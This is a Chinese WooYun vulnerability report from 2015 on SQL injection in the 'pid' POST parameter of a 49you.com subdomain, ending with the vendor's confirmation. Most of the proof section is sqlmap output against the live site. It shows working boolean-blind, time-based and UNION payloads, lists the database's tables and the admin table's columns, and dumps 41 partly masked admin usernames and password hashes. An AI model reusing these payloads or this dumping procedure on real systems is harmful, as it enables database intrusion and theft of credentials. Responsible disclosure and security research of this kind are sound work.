49you某分站存在SQL注入 | wooyun-2015-0123098| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123098

漏洞标题：49you某分站存在SQL注入

漏洞作者： hh2014

提交时间：2015-06-28 11:51

修复时间：2015-08-13 10:22

公开时间：2015-08-13 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-28：细节已通知厂商并且等待厂商处理中
2015-06-29：厂商已经确认，细节仅向厂商公开
2015-07-09：细节向核心白帽子及相关领域专家公开
2015-07-19：细节向普通白帽子公开
2015-07-29：细节向实习白帽子公开
2015-08-13：细节向公众公开

简要描述：

详细说明：

sql注入

http://gm.49you.com/spirit/send2.html
post参数
member_id=0&pid=51
pid参数存在注入

漏洞证明：

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- 
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
current user:    'customer_new@localhost'
current database:    'customer_new_49you'
current user is DBA:    False
available databases [2]:
[*] customer_new_49you
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- 
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
[12 tables]
+-------------------+
| ap_admininfo      |
| ap_evalute        |
| ap_loginfo        |
| ap_plo_category   |
| ap_ploblem        |
| ap_qqadmin        |
| ap_ratcontent     |
| ap_rating         |
| ap_report         |
| ap_screen         |
| ap_spirit_config  |
| ap_spirit_ploblem |
+-------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- 
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
Table: ap_admininfo
[10 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| addtime    | int(11)      |
| entry_time | varchar(50)  |
| headimg    | varchar(100) |
| password   | varchar(50)  |
| role       | tinyint(2)   |
| status     | tinyint(2)   |
| tid        | int(11)      |
| truename   | varchar(50)  |
| updatetime | int(11)      |
| username   | varchar(11)  |
+------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- 
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
Table: ap_admininfo
[41 entries]
+-----------+----------+------+----------------------------------+
| username  | truename | role | password                         |
+-----------+----------+------+----------------------------------+


mask 区域

*****4    | 4d1906e96fa*****
*****   | 3ce90681eb42*****
*****2    | dc483e80a7a*****
*****1    | dc483e80a7a*****
*****1    | 5ff4f22883a*****
*****1    | dc483e80a7a*****
*****1    | dc483e80a7a*****
*****   | dc483e80a7a0*****
*****1    | 4d1906e96fa*****
*****1    | a5721016407*****
*****1    | c3336770151*****
*****   | c4dc09934ef4*****
***** cc03e74dsfsdfgh*****
*****5    | a2ccbfbe338*****
*****| 3    | 358241e37e*****
*****1    | 87b750fdfeb*****
*****   | 2c25ac86a934f*****
*****| 2    | dc483e80a7*****
*****1    | a9f9f219a4b*****
*****1    | e10adc3949b*****
*****4    | c33367701511*****
*****   | 4d1906e96fa4*****
*****| 2    | 5ff4f22883*****
*****   | 8a5121ce1a3d*****
*****1    | 2e4a30796fb*****
*****1    | 54059ec4d7c*****
*****2    | ea53b454bcd*****
*****1    | 05d06619bf5*****
*****1    | 9fd00aba1fd*****
*****1    | 2c25ac86a93*****
*****1    | 2c25ac86a93*****
*****   | 2c25ac86a934f*****
*****1    | a3d39af924d*****
*****1    | effeec3e03c*****
*****1    | 3dc3a813753*****
*****1    | 86bee525c17*****
*****1    | 3dc3a813753*****
*****1    | 3dc3a813753*****
*****1    | 3dc3a813753*****
*****1    | 3dc3a813753*****
*****1    | 3dc3a813753*****
*****----------------*****





用户名：admin 密码：



mask 区域

*****111*****

修复方案：

参数过滤

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-06-29 10:20

厂商回复：

非常感谢白帽子童鞋 @路人甲，技术正在紧急修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123098

漏洞标题：49you某分站存在SQL注入

相关厂商：49you.com

漏洞作者： hh2014

提交时间：2015-06-28 11:51

修复时间：2015-08-13 10:22

公开时间：2015-08-13 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123098

漏洞标题：49you某分站存在SQL注入

相关厂商：49you.com

漏洞作者： hh2014

提交时间：2015-06-28 11:51

修复时间：2015-08-13 10:22

公开时间：2015-08-13 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0123098"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hh2014@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：